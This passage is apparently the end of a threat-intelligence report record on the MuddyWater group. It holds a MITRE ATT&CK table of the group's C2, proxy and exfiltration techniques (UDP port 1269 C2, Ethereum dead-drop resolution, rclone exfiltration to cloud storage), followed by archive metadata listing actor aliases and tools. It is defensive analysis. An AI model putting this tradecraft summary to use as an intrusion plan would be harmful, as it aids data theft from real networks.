T1027\r\nObfuscated Files or\r\nInformation\r\nObfuscated Node.js payloads within\r\nTsundere Bot\r\nDefense Evasion T1140\r\nDeobfuscate/Decode Files\r\nor Information\r\nEncrypted blobs decrypted at runtime by\r\nreset.ps1\r\nCommand and\r\nControl\r\nT1071.001\r\nApplication Layer Protocol:\r\nWeb Protocols\r\nPersianC2 HTTP polling; Tsundere Bot\r\nWebSocket C2\r\nCommand and\r\nControl\r\nT1095\r\nNon-Application Layer\r\nProtocol\r\nKey C2 custom binary protocol over UDP\r\nport 1269\r\nCommand and\r\nControl\r\nT1102.001\r\nWeb Service: Dead Drop\r\nResolver\r\nEthereum smart contract used to resolve\r\nC2 server IP addresses\r\nCommand and\r\nControl\r\nT1571 Non-Standard Port Key C2 operating on UDP port 1269\r\nCommand and\r\nControl\r\nT1573.001\r\nEncrypted Channel:\r\nSymmetric Cryptography\r\nArenaC2 encrypts all C2 traffic with\r\nAES-256-CBC using hardcoded keys\r\nCommand and\r\nControl\r\nT1090.002 Proxy: External Proxy\r\nresocks and revsocks SOCKS proxy\r\nlisteners for tunnelling into victim\r\nnetworks\r\nExfiltration T1041\r\nExfiltration Over C2\r\nChannel\r\nKey C2 and PersianC2 both support file\r\ndownload from victims\r\nExfiltration T1567\r\nExfiltration Over Web\r\nService\r\nStolen data exfiltrated to Wasabi S3 and\r\nput.io cloud storage via rclone\r\nExfiltration T1048\r\nExfiltration Over\r\nAlternative Protocol\r\nFlask-based HTTP file receiver\r\n( web.py ) on port 10443 and Amazon\r\nEC2 instance used for bulk file\r\nexfiltration outside C2 channel\r\nCollection T1005 Data from Local System\r\nSQL injection data exfiltration; file\r\nretrieval via C2\r\nSource: https://ctrlaltintel.com/threat%20research/MuddyWater/#python-server\r\nhttps://ctrlaltintel.com/threat%20research/MuddyWater/#python-server\r\nPage 22 of 22", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://ctrlaltintel.com/threat%20research/MuddyWater/#python-server" ], "report_names": [ "#python-server" ], "threat_actors": [ { "id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b", "created_at": "2022-10-25T15:50:23.308924Z", "updated_at": "2026-04-10T02:00:05.298591Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "MuddyWater", "Earth Vetala", "Static Kitten", "Seedworm", "TEMP.Zagros", "Mango Sandstorm", "TA450" ], "source_name": "MITRE:MuddyWater", "tools": [ "STARWHALE", "POWERSTATS", "Out1", "PowerSploit", "Small Sieve", "Mori", "Mimikatz", "LaZagne", "PowGoop", "CrackMapExec", "ConnectWise", "SHARPSTATS", "RemoteUtilities", "Koadic" ], "source_id": "MITRE", "reports": null }, { "id": "2ed8d590-defa-4873-b2de-b75c9b30931e", "created_at": "2023-01-06T13:46:38.730137Z", "updated_at": "2026-04-10T02:00:03.08136Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "TEMP.Zagros", "Seedworm", "COBALT ULSTER", "G0069", "ATK51", "Mango Sandstorm", "TA450", "Static Kitten", "Boggy Serpens", "Earth Vetala" ], "source_name": "MISPGALAXY:MuddyWater", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "156b3bc5-14b7-48e1-b19d-23aa17492621", "created_at": "2025-08-07T02:03:24.793494Z", "updated_at": "2026-04-10T02:00:03.634641Z", "deleted_at": null, "main_name": "COBALT ULSTER", "aliases": [ "Boggy Serpens ", "ENT-11 ", "Earth Vetala ", "ITG17 ", "MERCURY ", "Mango Sandstorm ", "MuddyWater ", "STAC 1171 ", "Seedworm ", "Static Kitten ", "TA450 ", "TEMP.Zagros ", "UNC3313 ", "Yellow Nix " ], "source_name": "Secureworks:COBALT ULSTER", "tools": [ "CrackMapExec", "Empire", "FORELORD", "Koadic", "LaZagne", "Metasploit", "Mimikatz", "Plink", "PowerStats" ], "source_id": "Secureworks", "reports": null }, { "id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb", "created_at": "2022-10-25T16:07:23.880522Z", "updated_at": "2026-04-10T02:00:04.775749Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "ATK 51", "Boggy Serpens", "Cobalt Ulster", "G0069", "ITG17", "Mango Sandstorm", "MuddyWater", "Operation BlackWater", "Operation Earth Vetala", "Operation Quicksand", "Seedworm", "Static Kitten", "T-APT-14", "TA450", "TEMP.Zagros", "Yellow Nix" ], "source_name": "ETDA:MuddyWater", "tools": [ "Agentemis", "BugSleep", "CLOUDSTATS", "ChromeCookiesView", "Cobalt Strike", "CobaltStrike", "CrackMapExec", "DCHSpy", "DELPHSTATS", "EmPyre", "EmpireProject", "FruityC2", "Koadic", "LOLBAS", "LOLBins", "LaZagne", "Living off the Land", "MZCookiesView", "Meterpreter", "Mimikatz", "MuddyC2Go", "MuddyRot", "Mudwater", "POWERSTATS", "PRB-Backdoor", "PhonyC2", "PowGoop", "PowerShell Empire", "PowerSploit", "Powermud", "QUADAGENT", "SHARPSTATS", "SSF", "Secure Socket Funneling", "Shootback", "Smbmap", "Valyria", "chrome-passwords", "cobeacon", "prb_backdoor" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434393, "ts_updated_at": 1775792062, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/580f97ddec2872f618306b86bddd4896bd56fe2f.pdf", "text": "https://archive.orkl.eu/580f97ddec2872f618306b86bddd4896bd56fe2f.txt", "img": "https://archive.orkl.eu/580f97ddec2872f618306b86bddd4896bd56fe2f.jpg" } }